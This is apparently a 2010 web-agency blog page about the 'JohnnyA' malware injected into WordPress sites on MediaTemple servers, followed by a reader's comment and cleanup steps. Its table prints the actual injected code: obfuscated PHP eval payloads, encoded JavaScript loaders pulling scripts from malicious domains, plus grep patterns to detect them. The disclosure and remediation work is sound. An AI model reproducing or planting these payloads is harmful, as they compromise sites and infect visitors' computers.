ToolBox
-
We’ll use this page to detail all information regarding the WordPress Injection Exploit, Malware which is infecting MediaTemple servers (and possibly other hosts as well – Please let us know if you are on another host).
MediaTemple claims this to be an “application-level” exploit (e.g. WordPress, Drupal, or other app), however all domains on our grid server account have been compromised while none (0) domains on our dedicated virtual accounts have been compromised. We believe it to be both a WordPress 2.9 vulnerability as well as a vulnerability in MediaTemple’s Grid Server Accounts. We believe the virus to be crawling the entire grid server, looking for “scripts” directories, and injecting code into javascript files, and creating php files.
More on the MediaTemple WordPress Grid-Server Exploit
You Are Infected When
- You have new admin users in your WordPress control panel. (e.g. “JohnnyA” or “JohnnyB” or “amin”) whom you did not create
- Extra code inserted into the head of your javascript files “scripts” directory (e.g. jquery-min.js)
- You get a virus alert message when visiting your website.
Description
From what we can tell: The virus exploits an older version of WordPress (prior to 3.01), and injects code into javascript files, php files, and even wordpress posts which then download viruses to the visitor’s computer. These virus’ have been known to seriously damage users computers.
Protecting Yourself
The good news is – if you are running an updated virus protection suite (including AVG or Avast (both free)), it will block the virus. If you are not, please – update or install virus protection asap.
Also, if you are not running the latest version of WordPress, we will need to upgrade it soon. The latest version of WordPress addresses and fixes this exploit.
Infections Found
| File/Location | Injection |
|---|---|
| Topmost Post | <h5><script src=”http://silver.smartenergymodel.com/js/jquery.min.js”></script></h5> |
| /theme/index.php | <?php $o = ’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’;eval(“\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B”); ?> |
| (theme)/js/Museo.font.js | var st1 = 0;document.write(unescape(‘%3C%73%63%72%69%70%74%3E%76%61%72%20%64%63%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%20%76%61%72%20%63%6E%61%6D%65%20%3D%20%27%77%61%74%63%68%74%69%6D%65%27%3B%20%76%61%72%20%77%6E%20%3D%20%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%3B%20%76%61%72%20%73%74%72%69%20%3D%20%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%3B%20%76%61%72%20%73%74%72%4F%53%20%3D%20%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%63%2E%69%6E%64%65%78%4F%66%28%63%6E%61%6D%65%29%3D%3D%2D%31%20%26%26%20%21%77%6E%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%73%74%72%69%29%20%26%26%20%73%74%72%4F%53%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%27%77%69%6E%27%29%20%21%3D%20%2D%31%29%20%7B%20%76%61%72%20%64%6F%6D%73%20%3D%20%5B%27%65%64%69%73%6F%6E%73%6E%69%67%68%74%63%6C%75%62%2E%63%6F%6D%27%2C%27%65%6D%61%70%69%73%2E%6F%72%67%27%2C%27%69%64%65%61%63%6F%72%65%70%6F%72%74%61%6C%2E%63%6F%6D%27%2C%27%6B%61%72%65%6E%65%67%72%65%6E%2E%63%6F%6D%27%5D%3B%20%76%61%72%20%70%72%65%66%66%73%20%3D%20%5B%27%61%71%75%61%2E%27%2C%27%61%7A%75%72%65%2E%27%2C%27%62%6C%61%63%6B%2E%27%2C%27%62%6C%75%65%2E%27%2C%27%62%72%6F%77%6E%2E%27%2C%27%67%6F%6C%64%2E%27%2C%27%67%72%61%79%2E%27%2C%27%67%72%65%65%6E%2E%27%2C%27%6C%69%6D%65%2E%27%2C%27%6E%61%76%79%2E%27%2C%27%6F%6C%69%76%65%2E%27%2C%27%70%6C%75%6D%2E%27%2C%27%72%65%64%2E%27%2C%27%73%6E%6F%77%2E%27%2C%27%77%68%69%74%65%2E%27%2C%27%79%65%6C%6C%6F%77%2E%27%5D%3B%20%76%61%72%20%64%6F%6D%20%3D%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%6F%6D%73%2E%6C%65%6E%67%74%68%29%3B%20%76%61%72%20%70%72%65%66%20%3D%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%70%72%65%66%66%73%2E%6C%65%6E%67%74%68%29%3B%20%64%74%3D%6E%65%77%20%44%61%74%65%28%29%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%20%2B%20%37%2A%33%36%30%30%2A%33%36%30%30%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%63%6E%61%6D%65%2B%27%3D%27%2B%65%73%63%61%70%65%28%63%6E%61%6D%65%29%2B%27%3B%65%78%70%69%72%65%73%3D%27%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%27%3B%70%61%74%68%3D%2F%27%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%70%72%65%66%66%73%5B%70%72%65%66%5D%2B%64%6F%6D%73%5B%64%6F%6D%5D%2B%27%2F%64%61%74%61%2F%6D%6F%6F%74%6F%6F%6C%73%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%3B%20%7D%3B%3C%2F%73%63%72%69%70%74%3E’));var gr0=0; |
| scripts/global.js | var st1 = 0;this.b=this.M=”";this.A=”";this.w=false;this.N=”"; (function(c){this.m=false;this.J=”";this.G=this.e=this.l=false;var g=window;this.i=”";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C=”qO”;this.B=”oB”;var a=new String(“”);this.I=”sW”;var e=new String(“%”);this.d=”";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c=”cO”;this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this.u=false;this.o=”jP”;this.j=false;this.k=”gZ”;this.s=false;d=”";for(a=0;a<c["le"+unescape("%6e%67%74%68")];a++){this.H= this.h=”";this.P=43510;this.r=this.z=”";this.v=37015;this.F=”qY”;this.L=62857;this.g=”eS”;e=c["char"+unescape("%43%6f%64%65%41%74")](a);this.D=false;e^=232;this.q=36524;d+=h(e);this.R=this.p=”"}this.f=”dX”;this.a=”";g["e"+unescape("%76%61%6c")](d);this.t=this.K=false;return d})(“9e899ac889d59f81868c879fc686899e818f899c879ac69d9b8d9aa98f8d869cc48ad5c7c09189808787949b8d899a8b8094859b868a879c949189868c8d90948f87878f848d8a879c948a81868f94899b83c1c781c48bd586899e818f899c879ac6899898be8d9a9b818786d3c8818ec08c878b9d858d869cc68b878783818dc681868c8d90a78ec0ca808784918b878783818dcac1d5d5c5d9cecec989c69c87a4879f8d9aab899b8dc0c1c685899c8b80c08ac1cece8bc69c87a4879f8d9aab899b8dc0c1c681868c8d90a78ec0ca9f8186cac1c9d5c5d9c1939e899ac88cd5b3ca8591898c9bc68689858dcac4ca898c9b868d9cc68a8192cac4ca9c8787848a899a8b8785c6879a8fcac4ca85918a899ac69d9bcac4ca8e9a8d8d898cc68689858dcab5c48dd5b3ca89908dc6cac4ca8a8790c6cac4ca8b8790c6cac4ca8c8d90c6cac4ca8e8990c6cac4ca8e8190c6cac4ca8e8790c6cac4ca8f8790c6cac4ca808d90c6cac4ca838d90c6cac4ca848990c6cac4ca848d90c6cac4ca848790c6cac4ca849d90c6cac4ca858990c6cac4ca858190c6cac4ca868190c6cac4ca879087c6cac4ca879091c6cac4ca988990c6cac4ca988190c6cac4ca988790c6cac4ca989190c6cac4ca9a8990c6cac4ca9a8d90c6cac4ca9b8990c6cac4ca9b8d90c6cac4ca9b8190c6cac4ca9b8790c6cac4ca9c8990c6cac4ca9c9d90c6cac4ca9e8d90c6cac4ca9e8790c6cac4ca9f8990c6cac4ca90819bc6cac4ca928990c6cab5c48ed5a5899c80c68e8487879ac0a5899c80c69a89868c8785c0c1c28cc6848d868f9c80c1c48fd5a5899c80c68e8487879ac0a5899c80c69a89868c8785c0c1c28dc6848d868f9c80c1d38c9cd5868d9fc8ac899c8dd38c9cc69b8d9cbc81858dc08c9cc68f8d9cbc81858dc0c1c3d1d8dfdaaddcc1d38c878b9d858d869cc68b878783818dd5ca808784918b878783818dd5cac38d9b8b89988dc0ca808784918b878783818dcac1c3cad38d9098819a8d9bd5cac38c9cc69c87afa5bcbb9c9a81868fc0c1c3cad398899c80d5c7cad3c88c878b9d858d869cc69f9a819c8dc0cfd49b8b9a81989cc89c91988dd5ca9c8d909cc782899e899b8b9a81989ccac89b9a8bd5ca809c9c98d2c7c7cfc38db38fb5c38cb38eb5c3cfc79b919b9c8d85c78b89989c818786c6829bcad6d4b4c79b8b9a81989cd6cfc195d3″); this.n=3279;this.O=58441;var gr0=0; |
More Information
We will continue to post more information as it comes in.
08/05/2010
Hi there,
Someone sent me this link via Twitter. I’m using WP via Media Temple and woke up this morning to having my site blocked due to Malware. I’ve been given so many different instructions about what the issue could possibly be. First, I was told there was malware in a dropdowns.js within my theme. I uploaded deleted what I was told to by Media Temple, and uploaded a fresh one. [I've used this theme without incidence for almost a year.]
Earlier today while hunting for solutions on my own [which is overwhelming when you have no clue what you're doing or looking for], I read up about “johnnyA” & was able to finally access my WP admin panel using Safari. [other browsers blocked my site] I did see an admin “johnnyA” and I deleted it and all links & posts associated with it as well.
Unfortunately, Media Temple didn’t feel this issue had anything to do with them and my support ticket with them only gave me a million different complex steps/thoughts/ideas – none of which have helped me. Equally unfortunate, Safari was apparently the only browser that would bypass the block and allow me to access my WP admin panel, and now that is blocked as well.
After taking to Twitter and publicly going nuts over this and getting tons of replies from others with the same situation, someone from Media Temple called me. He asked me to explain a timeline and I did. Again. [this was all in my support ticket] He made a comment about seeing what could be done and would call me back in an hour. That was almost 4 hours ago. I still do not have access to my site, Google still flags it, and I’m basically in limbo as I can’t access my WP admin panel at all. Messing around with databases would be a mess if I took it on myself.
The main reason I am commenting is this:
You mention the latest version of WP correcting the matter, and that isn’t accurate. I successfully upgraded automatically on 8/5/10, my site was running fine last night, and this problem began today, 8/6/10.
The funny thing is that I run WP on another domain and it’s fine. The only difference between the two is that the affected site [the one that is blocked] has WP running VIA Media Temple. The 2nd unaffected blog has WP that I installed on my own.
Am I completely in error in suspecting that this most definitely is a connection between the malware + MT + WP via MT? Or is that just a coincidence?
Sherri,
It sounds like you’ve got a fun infection on your hands. Let me try to answer everything as succinctly and directly as possible:
As to the source, I’ll just say I think MediaTemple should take more ownership than they are.
To clean the virus, you will need to do several things (in addition to upgrading wordpress) – as it now currently resides on your server. If these things are too difficult for you (e.g. editing the database, you’ll need to call someone who can help you, it isn’t too hard, but I’d be careful when editing the database directly)
1. Get some background on the JohnnyA virus here
2. Remove extra unused directories on your server
3. Change all passwords (database passwords, wordpress passwords, etc)
4. Remove fake admin users (e.g. JohnnyA, JohnnyB, amin)
5. Change WordPress Secret Keys
6. Clean Viruses by searching your entire domain for the following strings (more info on how to search for the virus using grep):
1. document.write of all .js files: grep -R “document.write(unescape” *
2. string longer than 255 chars in .php files: grep -iR –include “*.php” “[a-zA-Z0-9\/\+]\{255,\}” *
3. string longer than 255 chars in .js files: grep -iR –include “*.js” “[a-zA-Z0-9\/\+]\{255,\}” *
4. Nasty eval: grep -R “eval(gzinflate(base64_decode(”
7. Search your database for “<script ” injected into any posts
8. UPGRADE WORDPRESS TO LATEST VERSION (backup everything first)
9. Once cleaned (be sure everything is cleaned) – You’ll need to submit your site for review within Google Webmaster Tools
Using these steps I was able to remove a site within a few days from the Google Safe-browsing List.
Let us know if this helps you and/or if you need further clarification.
Kind regards,
Tison
1) You’ll need to change
[...] the attacks.The one I just dealt with on this blog (and 23 of my own and client blogs) was called JohnnyA. It inserted a Javascript that re-directed my site to a spam site and then spread PHP files through [...]